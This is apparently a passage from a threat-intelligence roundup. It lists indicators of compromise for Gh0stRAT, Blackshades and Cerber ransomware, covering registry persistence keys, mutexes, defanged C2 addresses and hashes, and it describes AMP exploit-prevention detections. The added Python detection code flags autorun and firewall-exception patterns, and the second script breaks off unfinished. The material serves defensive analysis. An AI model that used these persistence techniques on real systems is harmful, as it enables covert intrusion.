                053be505a2b2522fad8b7cb71f5bd04968cfb3ad5e77ad50eac80c71b9ad646d 06de4bdfc758de6336022f8301d692dcc17acbfc9663b367df86a02d528f2b90 09af6f559bcb42c006c0efc09f52dd592f459786c39780679d9d779998b6ecfd 0d2d5ff847cb20067e4213d78dcdf7aaa1c62546dcb00137b087d81703abddcc 21cc6498a5a9cecd5d0c3e94bddd4b182b8db1109268f7be061205fbdb91dfaf 2c1376de5d487cb0ea7be8b0f2710e3b205402bb78f20107a89711f8772120ac 3680339a0a4a8c411134b56dd25beb82b86e49e344d569beadd731d4e76d9cb5 3b24eaa42329d6abf6ce19c41738062797a2515122254b527fd5aec792723db6 3d16bedb9905e2ea113ccf8867502bb1b24d712234ef5a54257b8b3206e27479 43537dfd0609351d2e8d2e858aace8b0fb9ba89d301017a233fbd407f2ad39bd 455bf07f30cce22c8e45801258ea6ca480daed4537f50b2260bb372e784d6eaa 5458977721ca062b9d061190c01da20afc30e616b8264a9e88ef394039c476ed 5d4531531c698fa163199ee68a34661a212b69a93f43eff6d510e85f8663755c 6687eac3a15cb4e0e070ea5a72888644bfe05093e1e30a49b4e0a2a5a29d3d63 67b6cef58b9a052e1ae7994c930014a2ab045c3c7d856896747ceb3bff454c10 6fe8a7c6f231c9c8508879c983583810ea137d022b2d5b17b0213609f8a2f3e0 74f31384ed882520d99460a4583074e2269d3546f30fd08500a671e47f71519b 84e3298502bfa5ddfddc71f014eef7796ad4d1e11b5e40c52a65d3ac04771197 867bb45649adc9f5952e8944c0a4a2f256ed0875f52bd431212f5ade82d240f3 95ab1ac088f7be7dd71ecb6ea5c5923f4adbb05bd9480623ec788d6688ebae71 95cb3bbabe9d01355f0363f341b1a8d0d56b485e2b62c1111a0f68839c7d9c2e a0a861ff5549335dc76f9fd837e20073e23a2298b7e025615dfdbf0e00b0a91d a551656a575421e4cb87a7598846ab9436fb0bc7d9c7869edc8a4ca5d65ec105 b1aa0afb11da754c88e496a081982394a1ff8e6be6de0e54a11e27681095f8b1 beb20991985d1f3ea8654fdfb1e45824eed71a0abdff34ee1e3963a140a606ed
                *See JSON for more IOCs

                Coverage

                Product               Protection
                AMP                   This has coverage
                Cloudlock             N/A
                CWS                   This has coverage
                Email Security        This has coverage
                Network Security      N/A
                Stealthwatch          N/A
                Stealthwatch Cloud    N/A
                Threat Grid           This has coverage
                Umbrella              N/A
                WSA                   N/A

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Trojan.Gh0stRAT-7170222-1

                Indicators of Compromise

                Registry Keys    Occurrences
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Update_win
                29
                Mutexes    Occurrences
                sanshuigood.vicp.cc    3
                222.186.56.11    3
                rj.17caobi.com    2
                23.238.196.11    2
                222.186.34.200    1
                \BaseNamedObjects\103.249.28.41    1
                \BaseNamedObjects\174.139.211.14    1
                \BaseNamedObjects\174.139.208.54    1
                59.13.211.161    1
                67.229.57.228    1
                27.255.80.206    1
                220.70.90.33    1
                rj.dxjav.com    1
                117.52.14.152    1
                67.198.139.206    1
                67.229.224.82    1
                121.78.158.39    1
                loloyasumi.com    1
                100.43.130.130    1
                98.126.240.114    1
                184.83.6.205    1
                174.139.208.51    1
                183.86.218.138    1
                IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
                61[.]142[.]176[.]23    3
                222[.]186[.]56[.]11    3
                23[.]238[.]196[.]11    2
                216[.]218[.]206[.]69    1
                222[.]186[.]34[.]200    1
                103[.]249[.]28[.]41    1
                174[.]139[.]211[.]14    1
                174[.]139[.]208[.]54    1
                59[.]13[.]211[.]161    1
                67[.]229[.]57[.]228    1
                27[.]255[.]80[.]206    1
                220[.]70[.]90[.]33    1
                117[.]52[.]14[.]152    1
                67[.]198[.]139[.]206    1
                67[.]229[.]224[.]82    1
                121[.]78[.]158[.]39    1
                100[.]43[.]130[.]130    1
                98[.]126[.]240[.]114    1
                184[.]83[.]6[.]205    1
                174[.]139[.]208[.]51    1
                183[.]86[.]218[.]138    1
                Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
                sanshuigood[.]vicp[.]cc    3
                rj[.]17caobi[.]com    2
                rj[.]dxjav[.]com    1
                loloyasumi[.]com    1

                File Hashes

                0235f44dcc192d4a9388c9a209a8e28197be43afe382cd089b2445f15c4bfc7b 03e1d03b7ecc4dc2a4f781b83fb1d0677e885b995b96da937789ba594dfa6ba6 098522455fe96579b43408f37111f6064e2b564ff69e94f9808e01722e868c00 0b4a4f248629b27f3929e4a11186c35448c86921bd913dd5847a2c60ce430985 0f165051f607a0f289a8d9af17dec51cc9074134b70a766ae98293d08c8ae230 10609c1a910e9e71107cde6a3dc6f6ebcda7c2cb2a5775fe4e0217953f87c690 1d7dfe543d4ca35cfb162bf01e452c31240db8caa4452bb0fe5d382e730817d4 24bd88c9de5d9d09dc42a6b7338deb060c8444c1b57918a32d43739fa255247b 24fda94cdc7eb56af6fb5e6c39a85d9f80a1d622c4e3e5627bf30445b6b3a603 28bfbe60ce5013709c6e66d2aa96391dd260bdc3d6d7aa4dcd947ac79351a9e0 28c1255d7261e13d6a0f380267d43e190b1c54da127667591cda45844266265e 33d1367a9864cd8704db52626a5ff24d84ac74efd1414c371516b49a2bf73cb3 382ab955b1af78fba82e1209e6d61328d3100cb65f13be24615630dddf55af1a 383fed33d04f113938f2c21df9c7387e616ad4b528cb8d4dd6d0f8192ace729d 384583ac629ffbcb7a55da44910dd23cd380ce788bfae201c7ede3189959619f 38857b2a7f68193292de188f5ae07a1dc20cc8d9616a8fcfc8d7e56c9cb1342b 39027866667d05c74a96c42d98cd08b90a8f78dcfd88d3f28265a2dc5f1d1b7c 3b93d4215f033ae31063f5a790d6a139925a0e3a15f9e5ff32bf85b852eebcca 3c7c883d9cbfe7f0dc2a600e845becde9bf87898651ae475654fd79d37df5589 4bb16a15be32eb06a514619e851cca7a89b0e990c678192cd0a6329ac04dab5d 4c30fef1e3bb90050f8c874b92857e223179214a3c2e566da2c44dbf8b500d90 4c322440da73cf7b1152f3d62729cb4d8c2d8cefe8403743ca53283c33955689 51557a7629fe983488ac73c79717b97223c0babd9319916c3fbd575400eb09f0 51ae9265a88cf455a3143c022eea1e41038d3617f964ebf3f58310a9dfbacc33 68a9bf919b38f938938062e22852a3adebcca10973db9eb8172ee0e40e80fa34
                *See JSON for more IOCs

                Coverage

                Product               Protection
                AMP                   This has coverage
                Cloudlock             N/A
                CWS                   This has coverage
                Email Security        This has coverage
                Network Security      N/A
                Stealthwatch          N/A
                Stealthwatch Cloud    N/A
                Threat Grid           This has coverage
                Umbrella              This has coverage
                WSA                   This has coverage

                Screenshots of Detection

                AMP


                ThreatGrid


                Umbrella




                Win.Packed.Blackshades-7168564-1

                Indicators of Compromise

                Registry Keys    Occurrences
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
                Value Name: DoNotAllowExceptions
                67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\INSTALL 67
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS 67
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST 67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\SRVID 67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\SRVID\ID 67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\INSTALL\DATE 67
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
                Value Name: Microsoft/HKCU
                67
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Microsoft/HKCU
                67
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Microsoft/HKCU
                67
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE}
                Value Name: StubPath
                67
                <HKCU>\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE}
                Value Name: StubPath
                67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\SRVID\ID
                Value Name: 5FHDOAPLOK
                67
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
                Value Name: C:\Users\Administrator\AppData\Roaming\Adobe.exe
                67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\INSTALL\DATE
                Value Name: 5FHDOAPLOK
                67
                <HKCU>\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} 66
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} 65
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS
                Value Name: StubPath
                3
                <HKCU>\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS
                Value Name: StubPath
                3
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS 2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
                Value Name: C:\TEMP\1a461072aa3e19bc429aa83c49ea31c7722213865cf50a6937b62776a54d8a7b.exe
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
                Value Name: C:\TEMP\0cf04b4b65e7726e9d7d54f88299c4f1bbcad8aed4b586477c1bd7a48d21f318.exe
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
                Value Name: C:\TEMP\1c5fa3c699edc2528a14eb7763db3064fdf8ea90e6d35c5bba8f82f786d995d5.exe
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
                Value Name: C:\TEMP\3954af7bdbe570ff5c6fc1b7776b387a8b3a3d3bb57b0e187a9f4829b51c51cd.exe
                1
                Mutexes    Occurrences
                5FHDOAPLOK67
                \BaseNamedObjects\5FHDOAPLOK_pers35
                IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
                212[.]117[.]50[.]228    67
                Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
                c2upfront[.]no-ip[.]info    67
                3c2upfront[.]no-ip[.]info    67
                2c2upfront[.]no-ip[.]info    67
                1c2upfront[.]no-ip[.]info    67
                5c2upfront[.]no-ip[.]info    36
                7c2upfront[.]no-ip[.]info    36
                4c2upfront[.]no-ip[.]info    36
                6c2upfront[.]no-ip[.]info    36
                Files and or directories created    Occurrences
                \Autorun.ini67
                E:\Autorun.ini67
                %APPDATA%\Adobe.exe67
                %TEMP%\vbc.exe67
                %APPDATA%\Player67
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32925889681
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32994790951
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1184.32994877071
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32994903591
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.948.32994884401
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32994978471
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32994975971
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1184.32995075501
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32995069881
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32995067541
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32995156311
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1976.32995154281
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32995255521
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.744.32995256931
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32995357391

                File Hashes

                0061fdd7beb58e2d98dd6425c4467fabf84ee3261deed1ee41b3f09db77a3003 0103e022c0a56da31a998dab5f276be4bfa77e4b45e19d7e274e3ebfc6011794 020b795dc30a29af90cdf3d90213c74a9c1b18842077f48dc1cc824eefe52938 0435e4e9698ecdb041f392ee1e46204c64fa79151b028b9b3a938914a6348f7a 0444890807a5e1d7118896a2de574dd6ed48a0739ce371530ee15181336fe8ac 0581cf5e05f6f3a2148a8182cc6c753397d86eca85515c746a039a043c0156d3 0685f82e2301864e164b8ef4fb8e1f8a01540b3a87e5ca2b632be9b080446b9b 0835583f69abb28340d430ecc408e423c424a24a72a3a58e94a674e8a6880359 08c924b472ee439d357a811a209dac18bd337f5525d44c4a988158b51fb09feb 09898e7c85ce10d9f9e1d02c839b7b1b2c1a95826857854728b59548d0ea12f9 09a2f347ea8ca01153a1f53f668efcea8a85d98789abe0f4aebbbe83c72aed8c 09d34805c6ef60df465377aa7303c3edd19616aa3feba7051d8142f7020fc475 09d87c515a293798b1422625098e5a150c95e9a77e9b4f0207a9d3403fba1978 0a15b2293f794209b5190b12606d59fad342aa183d6a88aa841a70959cd5baf6 0bf4cdc4b180c5c4ceca11cb86be76a19a125ef097b94775a7f7c6b93d0d422f 0bf65a3c05256cb7fa901cfba4382f43032768c664dfab225ef504eda8b2667e 0c09b71359ae1c7358707eda957ae9e821d25e9c54ee9fba0d98a6cf22dcc77d 0c0e8ae82bff3013c7078798f6a9385262f42b27cdf6b89fe86e99aaaf49bd78 0c16e1bc2eece1ba2c3f590f7ea6a3cd32ae0cea789c6a2a066e85659b969107 0cb8b3dec2d52544e2adaf0e8be5765defaf8196fa93066d05f2e9db3ba0df5a 0cf04b4b65e7726e9d7d54f88299c4f1bbcad8aed4b586477c1bd7a48d21f318 0df2f3957a2a7793193ebcac0bd50db52c87f1062d41cb223dd621bbbe91362b 0f7d9402bc26786b576b5fdb6b60904f509bc643edd70ef3278652b7a716591d 0fbd9df4815f16405436ac36d5fe99ac0ae847cf3c0588534cd07d58bb918729 0fbe434942613ae5c6ea47d8abe73c86e898c6af97d89e802bb3ba5e5efc6647
                *See JSON for more IOCs

                Coverage

                Product               Protection
                AMP                   This has coverage
                Cloudlock             N/A
                CWS                   This has coverage
                Email Security        This has coverage
                Network Security      N/A
                Stealthwatch          N/A
                Stealthwatch Cloud    N/A
                Threat Grid           This has coverage
                Umbrella              N/A
                WSA                   N/A

                Screenshots of Detection

                AMP


                ThreatGrid
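The XtremeRAT and Blackshades registry tables above show the same persistence toolkit from two families: Run values whose name is a hive name (HKLM, HKCU, Microsoft/HKCU) rather than a product; an Active Setup StubPath under an Installed Components subkey, where XtremeRAT's {5S3M304I-21OR-7PJ2-WFYP-365WFB8ILY13} and {766867P2-2ICN-NQ0P-3VWT-3XW6E42YHP48} are GUID-shaped but not hexadecimal while its {5460C4DF-B266-909E-CB58-E32B79832EB2} and Blackshades' {CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} are well formed; a StubPath written directly on the Installed Components key itself; a Policies\Explorer\Run value; and, for Blackshades, a Windows Firewall AuthorizedApplications entry for %APPDATA%\Adobe.exe. The Python below is an added example, not Talos code. It checks key/value/data triples such as a `reg query` export yields for those patterns. The key and value names in the sample entries come from the tables; the data fields, the two baseline entries and the "user-writable path" heuristic are assumptions, and the OneDrive baseline is there to show that heuristic's noise.

```python
"""Flag the Windows registry persistence patterns shown in the XtremeRAT and
Blackshades tables above.

Added example for this page, not Talos code. Works on (key, value name, data)
triples such as a `reg query` export gives. Key and value names in the sample
entries are taken from the tables; the data fields, the baseline entries and
the "user-writable path" heuristic are assumptions for the demonstration.
"""
import re
from dataclasses import dataclass

# Active Setup component keys are normally GUIDs. XtremeRAT's
# {5S3M304I-21OR-7PJ2-WFYP-365WFB8ILY13} has the shape but not the hex alphabet;
# its {5460C4DF-B266-909E-CB58-E32B79832EB2} and Blackshades' GUID pass, so
# this check alone is not sufficient.
GUID_RE = re.compile(r"^\{[0-9A-F]{8}(-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$", re.I)
# Assumption: autostart binaries under these locations deserve a look.
USER_WRITABLE_RE = re.compile(
    r"\\appdata\\|\\temp\\|%appdata%|%temp%|%userprofile%|^c:\\temp\\", re.I)
# Run-key value names seen in the tables: a hive name is not how installers
# label their autorun entries.
ODD_RUN_VALUE_NAMES = {"hklm", "hkcu", "microsoft/hkcu"}


@dataclass(frozen=True)
class RegEntry:
    key: str
    value_name: str
    data: str


@dataclass(frozen=True)
class Finding:
    key: str
    value_name: str
    reason: str


def _norm(key: str) -> str:
    k = key.lower().replace("hkey_local_machine", "hklm").replace("hkey_current_user", "hkcu")
    return k.replace("\\wow6432node", "")  # 32-bit view of the same keys


def check_entry(e: RegEntry) -> list:
    k, name, out = _norm(e.key), e.value_name.lower(), []

    def add(reason):
        out.append(Finding(e.key, e.value_name, reason))

    if k.endswith("\\active setup\\installed components"):
        if name == "stubpath":  # StubPath on the parent key, as in the Blackshades table
            add("stubpath-on-parent")
    elif "\\active setup\\installed components\\" in k:
        if not GUID_RE.match(e.key.rsplit("\\", 1)[-1]):
            add("non-guid-component")
        if name == "stubpath" and USER_WRITABLE_RE.search(e.data):
            add("stubpath-user-writable")
    elif k.endswith("\\currentversion\\run"):
        if name in ODD_RUN_VALUE_NAMES:
            add("run-hive-name")
        if USER_WRITABLE_RE.search(e.data):
            add("run-user-writable")  # noisy: legitimate per-user apps live here too
    elif k.endswith("\\policies\\explorer\\run"):
        add("policies-run")  # Group Policy autorun location; confirm a GPO really sets it
    elif k.endswith("\\authorizedapplications\\list") and USER_WRITABLE_RE.search(e.value_name):
        add("firewall-exception-user-writable")
    return out


def scan_registry(entries) -> list:
    return [f for e in entries for f in check_entry(e)]


SAMPLE_ENTRIES = [
    # XtremeRAT-shaped (key/value names from the table; data constructed)
    RegEntry(r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run", "HKLM", r"C:\Windows\Hewlett\world.exe"),
    RegEntry(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "HKCU", r"C:\Windows\Hewlett\world.exe"),
    RegEntry(r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5S3M304I-21OR-7PJ2-WFYP-365WFB8ILY13}", "StubPath", r"C:\Windows\Hewlett\world.exe"),
    # Blackshades-shaped (key/value names from the table; data constructed)
    RegEntry(r"HKCU\Software\Microsoft\Active Setup\Installed Components\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE}", "StubPath", r"C:\Users\Administrator\AppData\Roaming\Adobe.exe"),
    RegEntry(r"HKCU\Software\Microsoft\Active Setup\Installed Components", "StubPath", r"C:\Users\Administrator\AppData\Roaming\Adobe.exe"),
    RegEntry(r"HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List", r"C:\Users\Administrator\AppData\Roaming\Adobe.exe", r"C:\Users\Administrator\AppData\Roaming\Adobe.exe:*:Enabled:Adobe"),
    RegEntry(r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", "Microsoft/HKCU", r"C:\Users\Administrator\AppData\Roaming\Adobe.exe"),
    # Constructed baseline: a Windows-style Active Setup component that should
    # stay quiet, and a per-user app that shows the path heuristic's noise.
    RegEntry(r"HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}", "StubPath", r"%SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall C:\Windows\system32\themeui.dll"),
    RegEntry(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive", r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
]

if __name__ == "__main__":
    for f in scan_registry(SAMPLE_ENTRIES):
        print(f"{f.reason:34} {f.key} -> {f.value_name}")
```

On the sample set this yields eight findings: two hive-named Run values, the non-GUID component, the StubPath into AppData, the StubPath on the parent key, the firewall exception, the Policies\Explorer\Run value, and one noisy hit on the OneDrive baseline. The non-GUID check catches only some XtremeRAT samples, which is why the StubPath location and the Run value names are checked as well.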




                Win.Ransomware.Cerber-7168312-0

                Indicators of Compromise

                Registry Keys    Occurrences
                <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 116
                <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
                Value Name: PendingFileRenameOperations
                116
                Mutexes    Occurrences
                shell.{381828AA-8B28-3374-1B67-35680555C5EF}    116
                \BaseNamedObjects\shell.{CA0E5370-75D1-0D8C-179E-782353EA1E4D}    16
                IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
                178[.]33[.]163[.]254    116
                178[.]33[.]162[.]254    116
                178[.]33[.]160[.]254    116
                178[.]33[.]161[.]254    116
                178[.]33[.]160[.]224    116
                178[.]33[.]160[.]240    116
                178[.]33[.]162[.]192    116
                178[.]33[.]158[.]0    116
                178[.]33[.]159[.]0    116
                178[.]33[.]160[.]0    116
                178[.]33[.]160[.]128    116
                178[.]33[.]160[.]192    116
                178[.]33[.]160[.]248    116
                178[.]33[.]160[.]252    116
                178[.]33[.]161[.]0    116
                178[.]33[.]161[.]128    116
                178[.]33[.]161[.]192    116
                178[.]33[.]161[.]224    116
                178[.]33[.]161[.]240    116
                178[.]33[.]161[.]248    116
                178[.]33[.]161[.]252    116
                178[.]33[.]162[.]0    116
                178[.]33[.]162[.]128    116
                178[.]33[.]162[.]224    116
                178[.]33[.]162[.]240    116
                *See JSON for more IOCs
                Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
                api[.]blockcypher[.]com    116
                bitaps[.]com    79
                chain[.]so    79
                BTC[.]BLOCKR[.]IO    79
                hjhqmbxyinislkkt[.]1j9r76[.]top    37
                bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com    16
                Files and or directories createdOccurrences
                %TEMP%\d19ab989116
                %TEMP%\d19ab989\4710.tmp116
                %TEMP%\d19ab989\a35f.tmp116
                %TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp116
                %TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp116
                <dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt116
                <dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta116
                <dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy)16

                File Hashes

                0829786ae40c18d826631865dbd36bc72a5bf83855657316fa7b08221ff0f5cc
                0e53d248a1e595deacef928a940792265e8f9e6e19aeedd6f15e9d3e77151ca3
                0f1c4d1e75c4299391acc42ee6aeb7c37f662f49ddded5cda67b65e77c994590
                116624dbb1103e20eb32786253daa919157862965ecee4a681ea6618b745297a
                142a504ded2285194cc6d8a0d22ed667bb7e6755482b5a3781d21cff28a49f0c
                166a7b7eb006ea685202b6fb866405290a8d881b1f17d8a713a8fba6019edf3a
                1a21029006cd625a8eadf49354e1717d43d657eb185e905992a0b973813fe860
                1ab97328ebfdaef12899218b558c1f0ec30495262794d0f6b4f4546aaa5e7e85
                1d6782e87dbc95c0639bc44cd05bb172be993af6ba6cd5365f22f3e350a9f504
                1ef0774c485c4921846551f9b2238804925ddb85fe9383202f94d313f8775528
                220748f24923783182a2120dcd5a24799e799d13678ad58a117b064fe9f32d49
                2424a1e17d890329fcb2926c40584a7f335cdcb6870f05eff82e2282fae8a3b4
                24578d9dfad55c280b363ee5a37f71a1aa2f5cd1388dcc67097caf03ec973782
                25e96af9b71863c16e25f18ef627347aab568f190fc71956fa63553f2b2f65a2
                274fbe5faac90ea5ffef8e7b4b9da60642f040194c28dce7de4f9c30b92a7b07
                2df15738f5c6d25d23d54d5d74d8ade3eea927152c3cad6307de580397d8b56f
                301e0d38d0bac986fe185ab4e420a623bbbbf9103d767950a3dd678111354a8b
                37b913abb385ae596b98a0366e4b33fac6e5dc6423bff07375e210774dd6d1ca
                382b8aac516f52bcba3ca0dadae42e550e54bd18fee696d732aa59687c388992
                38d4098a18344443ad15805810ba895ceefaf05be83f8ac2f53ea2f69ae7745d
                3a523bb773df8f955d0ca81ee411b044692d8c24793cdaba348c2505fddcba09
                3cc7d8e616d84ec21af5a3c60348f101a53c0a09257d0fdb4d7d15a4268e6330
                3ff2ab9bdbfcc01eb114bf8cfa9ebb6b222b0572eddefb7b09b31e78a99bcdec
                412f050b6b171f08875aa4ee5e54a0ec5b263cef01e27debc47324342f6ae188
                42bff53fe89ff3b4bc908bfb53fbcb6dda006fed7d6cfb9ab04ce84dbd62f9c2
                *See JSON for more IOCs

                Coverage

                Product | Protection
                AMP | This has coverage
                Cloudlock | N/A
                CWS | This has coverage
                Email Security | This has coverage
                Network Security | N/A
                Stealthwatch | N/A
                Stealthwatch Cloud | N/A
                Threat Grid | This has coverage
                Umbrella | N/A
                WSA | N/A

                Screenshots of Detection

                AMP (screenshot not reproduced)

                ThreatGrid (screenshot not reproduced)

                Malware (screenshot not reproduced)


                Exploit Prevention

                Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps defend endpoints from the memory attacks commonly used by obfuscated malware and exploits. These exploits use certain techniques to bypass typical anti-virus software, but are blocked by AMP thanks to its advanced scanning capabilities, which protect even against zero-day vulnerabilities.
                CVE-2019-0708 detected - (11771)
                An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
                Process hollowing detected - (2431)
                Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
                Excessively long PowerShell command detected - (2353)
                A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
                Madshi injection detected - (1796)
                Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
                Kovter injection detected - (1465)
                A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
                Trickbot malware detected - (688)
                Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
                Gamarue malware detected - (170)
                Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
                Installcore adware detected - (95)
                InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
                Dealply adware detected - (46)
                DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
                Fusion adware detected - (44)
                Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware.
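As an added illustration of the "Excessively long PowerShell command" class of detection described above (example code written for this page, not Talos or AMP detection logic), the Python below applies two of the heuristics such a detection rests on to constructed process-creation records: an unusually long command line, and an -EncodedCommand argument whose decoded script contains strings that are common in obfuscated PowerShell. The record field names, the length threshold, the keyword list and the sample events are all assumptions made for the example.

```python
import base64
import re

# Assumption: process-creation telemetry normalised to {"id", "image", "cmdline"}.
# The sample events further down are constructed for this example, not real telemetry.
LONG_CMDLINE_THRESHOLD = 1000   # assumption: tune against the environment's baseline

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so build the whole set of accepted spellings rather than matching one of them.
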